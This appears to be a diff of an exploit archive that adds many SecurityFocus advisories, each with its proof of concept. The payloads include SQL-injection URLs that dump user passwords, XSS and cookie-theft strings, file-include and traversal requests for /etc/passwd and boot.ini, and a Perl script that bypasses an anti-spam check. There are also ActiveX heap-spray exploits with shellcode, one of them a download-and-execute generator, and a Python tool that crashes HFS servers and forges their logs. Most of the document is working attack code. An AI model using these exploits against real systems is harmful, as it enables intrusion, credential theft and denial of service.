occurs via the
# javascript callback function "extractKey"
$tmpContent = $mech->content;
# Eliminate carriage returns to apply sed. Later I'll have to restore
them
# to execute the javascript code, as not every line is semicolon
terminated.
# That's the reason of the __WHO_BAMS_WHO__ string.
$_ = $mech->content;
s/\n/__WHO_BAMS_WHO__/g;
# Extract the javascript code and the name of the variable where the key
is going to be calculated
/<script type="text\/javascript">(.*)document\.write\('<input
type="hidden" name="comment_spambamKey" value="'\+(.*)\+'">'\);/g;
$javascriptCode = $1;
$spamBamKey = $2;
# Add the javascript instruction which will comunicate the key to the
perl code.
$javascriptCode .= "\nextractKey($spamBamKey);";
my $js = JavaScript::SpiderMonkey->new();
$js->init(); # Initialize Runtime/Context
# Define perl callback for extracting the key from the javascript code
$js->function_set("extractKey", sub { $tmpContent =~ s/<\/form>/<input
type=\"hidden\" name=\"comment_spambamKey\" value=\"@_\"><\/form>/; });
# Restore Carriage returns and execute javascript code
$javascriptCode =~ s/__WHO_BAMS_WHO__/\n/g;
my $rc = $js->eval($javascriptCode);
$js->destroy();
# Process form
$mech->update_html( $tmpContent );
$mech->form_number(1);
$mech->field("author", $author);
$mech->field("email", $email);
$mech->field("comment", $comment);
$mech->submit();
printf("Check it. Comment should have been added\n");

11
platforms/php/webapps/31034.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/27323/info
MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to MyBB 1.2.11 are vulnerable.
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'+UNION+SELECT+waraxe--+
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=war|axe

11
platforms/php/webapps/31035.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/27335/info
Clever Copy is prone to multiple input-validation vulnerabilities, including two SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Clever Copy 3.0; other versions may also be affected.
http://www.example.com/cc/postcomment.php?ID=&#039;/**/union/**/select/**/1,2,3,4,5,6,concat(char(117,115,101,114,110,97,109,101,61),username),concat(0x70617373776f72643d,password),9,10,11,12,13,14,15,16,17/**/from/**/cc_users/**/where/**/theid=1/*
http://www.example.com/cc/gallery.php?album=&#039;/**/union/**/select/**/null,password,null,null,username,null,null,null/**/from/**/cc_users/**/where/**/theid=1/*
http://www.example.com/cc/gallery.php?album=<script>alert(&#039;xss&#039;)</script>

9
platforms/php/webapps/31037.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27346/info
phpAutoVideo is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code within the context of the webserver process, steal cookie-based authentication credentials, and launch other attacks.
phpAutoVideo 2.21 is vulnerable; other versions may also be affected.
http://www.example.com/[Target.il]/[Path]/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=[SH3LL]

9
platforms/php/webapps/31038.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27346/info
phpAutoVideo is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code within the context of the webserver process, steal cookie-based authentication credentials, and launch other attacks.
phpAutoVideo 2.21 is vulnerable; other versions may also be affected.
http://www.example.com/[Target.il]/[Path]/index.php?cat=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

20
platforms/php/webapps/31041.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/27361/info
bloofoxCMS is prone to a directory-traversal vulnerability, a SQL-injection vulnerability, and an authentication-bypass vulnerability.
The SQL-injection vulnerability occurs because the application fails to sufficiently sanitize user-supplied data to the 'username' parameter of the 'class_permissions.php' script before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The authentication-bypass vulnerability stems from a lack of input-validation mechanisms in the 'system/class_permissions.php' file. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The directory-traversal vulnerability occurs because the application fails to properly sanitize user-supplied input data to the 'file' parameter of 'file.php'. The attacker's input would consist of '../' directory-traversal sequences. Successful exploits could allow the attacker to access the contents of potentially sensitive files on the affected computer. Information obtained may help the attacker launch other attacks against the system.
bloofoxCMS 0.3 is vulnerable to these issues; previous versions may be affected as well.
Username: admin' or 1=1 /*
Password: something
An example for the directory-traversal vulnerability was provided:
GET: http://www.example.com/bloofoxCMS_0.3/file.php?file=../../system/class_mysql.php

9
platforms/php/webapps/31044.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27382/info
singapore Modern template is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Modern 1.3.2 and prior versions are reported vulnerable. Reports indicate that Modern 1.3.2 ships with singapore 0.10.1 by default.
http://www.example.com/[singapore_path]/default.php?gallery="><script>alert(document.cookie);</script>

9
platforms/php/webapps/31045.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27383/info
Small Axe Weblog is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
This issue affects Small Axe Weblog 0.3.1; other versions may also be vulnerable.
http://www.example.com/inc/linkbar.php?ffile=http://www.example2.com

11
platforms/php/webapps/31048.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/27397/info
PacerCMS is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect versions prior to PacerCMS 0.6.1.
NOTE: To exploit these issues, the attacker may require 'staff member' access.
http://www.example.com/pacercms/siteadmin/article-edit.php?id=[SQL]

9
platforms/php/webapps/31049.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27401/info
DeluxeBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects DeluxeBB 1.1; other versions may also be vulnerable.
http://www.example.com/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script>

9
platforms/php/webapps/31060.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27459/info
Drake CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Drake CMS 0.4.9 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?option="'><IFRAME%20SRC="javascript:alert('XSS');"></IFRAME>&Itemid=12

9
platforms/php/webapps/31061.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27460/info
The 'trixbox' product is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
These issues affect trixbox 2.4.2.0; earlier versions may also be vulnerable.
http://www.example.com/user/index.php?"><script>alert('xss')</script>

9
platforms/php/webapps/31062.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27460/info
The 'trixbox' product is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
These issues affect trixbox 2.4.2.0; earlier versions may also be vulnerable.
http://www.example.com/maint/index.php?"><script>alert('xss')</script>

9
platforms/php/webapps/31063.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27461/info
WebCalendar is prone to multiple HTML-injection and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials. The attacker could also exploit the HTML-injection issues to control how the site is rendered to the user; other attacks are also possible.
These issues affect WebCalendar 1.1.6; other versions may also be vulnerable.
http://www.example.com/pref.php?>&#039;"><script>alert(&#039;XSS&#039;)</script>

9
platforms/php/webapps/31064.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27461/info
WebCalendar is prone to multiple HTML-injection and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials. The attacker could also exploit the HTML-injection issues to control how the site is rendered to the user; other attacks are also possible.
These issues affect WebCalendar 1.1.6; other versions may also be vulnerable.
http://www.example.com/search.php?adv=>"&#039;><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>

9
platforms/php/webapps/31065.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27462/info
F5 BIG-IP Application Security Manager is prone to a cross-site scripting vulnerability because the web management interface fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects F5 BIG-IP Application Security Manager 9.4.3; other versions may also be vulnerable.
https://(target)/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+

9
platforms/php/webapps/31066.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27470/info
The MOStlyCE module for Mambo is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected.
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=<script>alert(document.cookie)</script>

9
platforms/php/webapps/31067.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27471/info
ClanSphere is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to access potentially sensitive information that may aid in further attacks.
ClanSphere 2007.4.4 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00

9
platforms/php/webapps/31068.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27472/info
The MOStlyCE module for Mambo is prone to an arbitrary-file-upload vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to upload and execute arbitrary script code in the context of the affected webserver process.
MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected.
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=

9
platforms/php/webapps/31069.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27473/info
eTicket is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
eTicket 1.5.6-RC4 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php/"><script>alert('XSS')</script>

24
platforms/windows/local/31036.txt Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/27341/info
CORE FORCE Firewall and Registry modules are prone to multiple local kernel buffer-overflow vulnerabilities because the software fails to adequately verify user-supplied input.
Local attackers can exploit these issues to cause denial-of-service conditions. Attackers may also be able to escalate privileges and execute arbitrary code, but this has not been confirmed.
These issues affect versions up to and including CORE FORCE 0.95.167.
All the vulnerabilities can be reproduced by running a combination of
DC2 and BSODHook tools.
Step by step instructions:
- Get DC2.exe (Driver Path Verifier) from the latest Windows Driver Kit.
- Login as unprivileged user.
- Run "dc2 /hct /a".
- Get BSODHook.exe from Matousec
http://www.matousec.com/projects/windows-personal-firewall-analysis/plague-in-security-software-drivers.php
- Click on "Load Driver" then click on "Find SSDT hooks" then "Add to
probe list" and then "GO".

9
platforms/windows/remote/31039.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27358/info
BitDefender Update Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access potentially sensitive information that could aid in further attacks.
BitDefender Security for File Servers, BitDefender Enterprise Manger, and other BitDefender products that include the Update Server are vulnerable. This issue affects Update Server when running on Windows; Linux and UNIX variants may also be affected.
echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port>

9
platforms/windows/remote/31040.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27360/info
Surveillix DVR 'MeIpCamX.DLL' ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
These issues affect 'MeIpCamX.DLL' 1.0.0.4; other versions may also be vulnerable.
<!-- Toshiba Surveillance (Surveillix) RecordSend Class (MeIpCamX.DLL 1.0.0.4) remote buffer overflow exploit (IE7/xpsp2) a demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio codebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.cab rgod-tsid-pa-he-ru-ka - stay tuned with us ... http://retrogod.altervista.org/join.html security feeds, radio streams, techno/drum & bass stations to come --> <html> <object classid='clsid:AD315309-EA00-45AE-9E8E-B6A61CE6B974' id='RecordSend' /> </object> <script language="javascript"> ///add su one, user: sun pass: tzu shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" + "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" + "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" + "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" + "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" + "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" + "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" + "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" + "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" + "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" + "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" + "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" + "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" + "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" + "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" + "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" + "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" + "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" + "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" + "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" + "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" + "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" + "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" + "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" + "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" + "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" + "%u7734%u4734%u4570"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<444;i++){memory[i] = block+shellcode} //thx to Solar Designer and metasploit crew, is always intended puf=""; for (i=0;i<28;i++){puf = puf + unescape("%0e")} //no more than 28, otherwise you fall in seh tricks RecordSend.SetPort(puf); //SetIpAddress method is vulnerable too, check by yourself </script> </html>

80
platforms/windows/remote/31046.cpp Executable file
View file

@ -0,0 +1,80 @@
source: http://www.securityfocus.com/bid/27393/info
GlobalLink 'GLChat.ocx' ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
GlobalLink 'GLChat.ocx' ActiveX control 2.5.1.33 is reported affected by this issue; other versions may also be vulnerable.
//date:2007.10 fuzz by Knell@Knell-0xSec QQ:415964
#define _CRT_SECURE_NO_DEPRECATE
#include <windows.h>
#include <stdio.h>
const unsigned char shellcode[174] =
{
0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};
const char* script1 = \
"<html><body><object id=\"sb\" classid=\"clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69\"></object><script>"
"var shellcode = unescape(\"";
const char* script2 = \
"\");"
"bigblock = unescape(\"%u9090\");"
"headersize = 20;"
"slackspace = headersize + shellcode.length;"
"while ( bigblock.length < slackspace ) bigblock += bigblock;"
"fillblock = bigblock.substring(0, slackspace);"
"block = bigblock.substring(0, bigblock.length - slackspace);"
"while(block.length + slackspace < 0x40000) block = block + block + fillblock;"
"memory = new Array();"
"for (x=0; x< 300; x++) memory[x] = block + shellcode;"
"var zhen = '\\x0a';"
"while (zhen.length < 4057) zhen += '\\x0a\\x0a\\x0a\\x0a';"
"sb.ChatRoom = zhen;"
"</script>"
"</body>"
"</html>";
int main(int argc, char* argv[])
{
if ( argc != 2 )
{
printf("usage:knell.exe down&exec-url\njÖʽçlobalLink)GLChat.ocx ActiveX Control BoF exploit\n bug fuzz by knell 2007.10\n");
return -1;
}
FILE *file = fopen("knell.html", "w+");
if ( file == NULL )
{
printf("create 'knell.html' failed!\n");
return -2;
}
fprintf(file, "%s", script1);
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
const unsigned l = strlen(argv[1]);
for ( unsigned j = 0; j < l; j += 2 )
fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);
fprintf(file, "%s", script2);
fclose(file);
printf("make 'knell.html' successed!\n");
return 0;
}

334
platforms/windows/remote/31056.py Executable file
View file

@ -0,0 +1,334 @@
source: http://www.securityfocus.com/bid/27423/info
HFS (HTTP File Server) is prone to multiple security vulnerabilities, including cross-site scripting issues, an information-disclosure issue, an arbitrary file-creation issue, a denial-of-service issue, a username-spoofing issue, and a logfile-forging issue.
A successful exploit could allow an attacker to deny service to legitimate users, create and execute arbitrary files in the context of the webserver process, falsify log information, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.
#!/usr/bin/python
"""
----------------------------------------------------------------
HFSHack 1.0b (By Felipe M. Aragon And Alec Storm )
----------------------------------------------------------------
* CVE-2008-0409 - Cross-Site Scripting (XSS) and Host Field XSS
* CVE-2008-0410 - Information Disclosure Vulnerability
Affected Versions: HFS 2.0 to and including 2.3(Beta Build 174)
http://www.syhunt.com/advisories/hfs-1-template.txt
* CVE-2008-0405 - Arbitrary File/Folder Creation Vulnerability
* CVE-2008-0406 - Denial of Service (DoS) Vulnerability
Affected Versions: HFS 2.2 to and including 2.3(Beta Build 174)
http://www.syhunt.com/advisories/hfs-1-log.txt
* CVE-2008-0407 - Username Spoofing Vulnerability
* CVE-2008-0408 - Log Forging / Injection Vulnerability
Affected Versions: HFS 1.5g to and including 2.3(Beta Build
174); and possibly HFS version 1.5f
http://www.syhunt.com/advisories/hfs-1-username.txt
Vulnerabilities found by Syhunt (http://www.syhunt.com)
Sandcat can also identify these issues:
http://www.syhunt.com/sandcat
"""
import urllib2, sys, re, commands, StringIO, string, base64
host = '127.0.0.1' # Default Host
help = ('\n'
'open [hostname]\n'
' This should be called first (unless you want the default host)\n\n'
'checkdos\n'
' Performs the Log DoS Attack (Makes the server crash)\n\n'
'checkxss\n'
' Checks for the presence of the Template XSS Vulnerability\n\n'
'manipf [localfilename] [remotefilename]\n'
' Appends content of a local file to a remote file. Examples:\n'
' manipf inject.html index.html or ..\\..\index.html\n'
' Note: If the file does not exists, it will be created.\n\n'
'maniplog [localfilename]\n'
' Injects content of a local file to the HFS log panel and file\n\n'
'mkd [dirname]\n'
' Creates directories. Examples:\n'
' mkd Test or ..\\..\\Windows\\Test\n\n'
'symbols\n'
' Forces HFS to reveal details about the server\n\n'
'ver\n'
' Forces HFS to show its version and build, and displays which\n\n'
' HFSHack commands are available for it\n'
'quit\n'
' Exits this application'
'\r\n')
readme = (
'(c) 2008 Syhunt Security. All rights reserved.\n\n'
'This tool is provided ''as-is'', without any expressed or implied\n'
'warranty. In no event will the author be held liable for any\n'
'damages arising from the use of this tool.\n\n'
'Permission is granted to anyone to use this tool, and to alter\n'
'it and redistribute it freely, subject to the following\n'
'restrictions:\n\n'
'1. The origin of this tool must not be misrepresented, you must\n'
' not claim that you wrote the original tool.\n\n'
'2. Altered source versions must be plainly marked as such, and\n'
' must not be misrepresented as being the original plugin.\n\n'
'3. This notice may not be removed or altered from any source\n'
' distribution.\n\n'
'If you have any questions concerning this license, please email\n'
'contact _at_ syhunt _dot_ com\n'
)
about = (
'----------------------------------------------------------------\n'
' Syhunt HFSHack 1.0b\n'
'----------------------------------------------------------------\n\n'
'This exploit tool should be used only by system administrators\n'
'(or other people in charge).\n\n'
'Type "readme" and read the text before continuing\n\n'
'If you have already read it, type "help" to view a list of\n'
'commands.'
)
# Extra Details to Obtain
symbol_list = (
'connections;Current number of connections to HFS',
'timestamp;Date and time of the server',
'uptime;Uptime',
'speed-out;Current outbound speed',
'speed-in;Current inbound speed',
'total-out;Total amount of bytes sent',
'total-downloads;Total amount of bytes sent',
'total-hits;Total Hits',
'total-uploads;Total Uploads',
'number-addresses;Current number of connected clients (IPs)',
'number-addresses-ever;Number of unique IPs ever connected',
'number-addresses-downloading;Current number of downloading clients (IPs)',
)
# Affected Versions
re_200801161 = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b]|2.3 beta)'
re_200801162 = '^HFS(.*?)(2.2$|2.2[a-b]|2.3 beta)'
re_200801163 = '^HFS(.*?)(1.5[f-g]|1.6|2.[0-1]|2.2$|2.2[a-b]|2.3 beta)'
re_cangetver = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b])'
# Common Messages
msg_par_mis = 'Parameter(s) missing.'
msg_done = 'Done.\n'
msg_acc_file = 'Error reading local file (file not found):'
msg_help = 'Type "help" to view a list of commands.'
msg_err_con = 'Error Connecting:'
msg_fail = 'Failed.'
msg_req_ok = 'Request accepted.'
uagent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Syhunt HFSHack)';
path = '/' # Default Path
def dorequest(hpath,auth_data,s_msg,f_msg):
globals()["rcvd"] = ''
globals()["banner"] = ''
url = 'http://'+host+hpath
try:
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', uagent)]
if auth_data != '':
opener.addheaders = [('Authorization', 'Basic '+auth_data)]
globals()["rcvd"] = opener.open(url).readlines()
if 'server' in opener.open(url).headers:
globals()["banner"] = opener.open(url).headers['server']
except Exception, msg:
if f_msg != '':
print f_msg,msg
return False
else:
if s_msg != '':
print s_msg
return True
def genbase64str(string):
base64str = base64.encodestring(string);
base64str = base64str.replace("\n","")
return base64str
def readlocalfile(filename):
file = open(filename, "r")
text = file.readlines()
file.close()
print text
filecontentstr = ''
for l in text:
filecontentstr = filecontentstr+l
return filecontentstr
def ishostavailable():
return dorequest(path,'','',msg_err_con)
def getservinfo(symbol,desc):
base64str = base64.encodestring('<id>%'+symbol+'%</id>');
if dorequest(path,base64str,'',msg_err_con):
for l in rcvd:
hfsver = re.findall('<id>(.*?)</id>', l)
for r in hfsver:
if r != []:
hfsverdec = urllib2.unquote(hfsver[0])
if desc != '':
print desc+': '+hfsverdec
return hfsverdec
else:
return ''
def getallservinf():
for l in symbol_list:
curl = l.split(';')
getservinfo(curl[0],curl[1])
def hfsmkdir(dirname):
base64str = genbase64str('\\..\\'+dirname+'\\')+'AA';
dorequest(path,base64str,msg_req_ok,msg_fail)
def shutdownhfs():
dosstr = genbase64str('a' * 270 + ':')
if dorequest(path,dosstr,msg_fail,'DoS executed.'):
dorequest(path,'','Host is still up.','Host is now down.')
def hfsappendtofile(filename,string):
base64str = genbase64str('\\..\\'+filename)+'AA';
dorequest('/?%0a'+string,base64str,msg_req_ok,msg_fail)
def hfsinjecttolog(string):
base64str = genbase64str(string);
dorequest('/',base64str,msg_req_ok,msg_fail)
def procparams(cmd):
try:
if len(cmd) > 0:
if cmd[1] != []:
globals()["host"] = cmd[1]
except:
print "No target info provided. Using localhost"
def checkxss():
if ishostavailable():
curver = getservinfo('version','')
if curver != '':
return 'XSS Found'
else:
return 'Not Vulnerable'
else:
return msg_fail
def isbanner(regex):
p = re.compile(regex)
m = p.match(banner)
return m
def showacceptedcmds():
cmds = 'None (This server is not vulnerable)';
if isbanner(re_200801161):
cmds = 'checkxss symbols ver'
if isbanner(re_200801162):
cmds = cmds+' manipf mkd checkdos'
if isbanner(re_200801163):
cmds = cmds+' maniplog'
print '\nAvailable commands for this server:'
print ' '+cmds+'\n'
def showver():
cangetver = True
if banner != '':
server_name = banner.split()
print banner
if server_name[0] != 'HFS':
print 'Not running HFS!'
cangetver = False
else:
if isbanner(re_cangetver):
print 'Confirming version...'
else:
cangetver = False
else:
print 'No version information found.'
print 'The "Send HFS identifier" option is probably disabled.'
print 'Trying to force HFS to display its version...'
if cangetver == True:
idver = getservinfo('version','HFS version number')
idbuild = getservinfo('build','HFS build number')
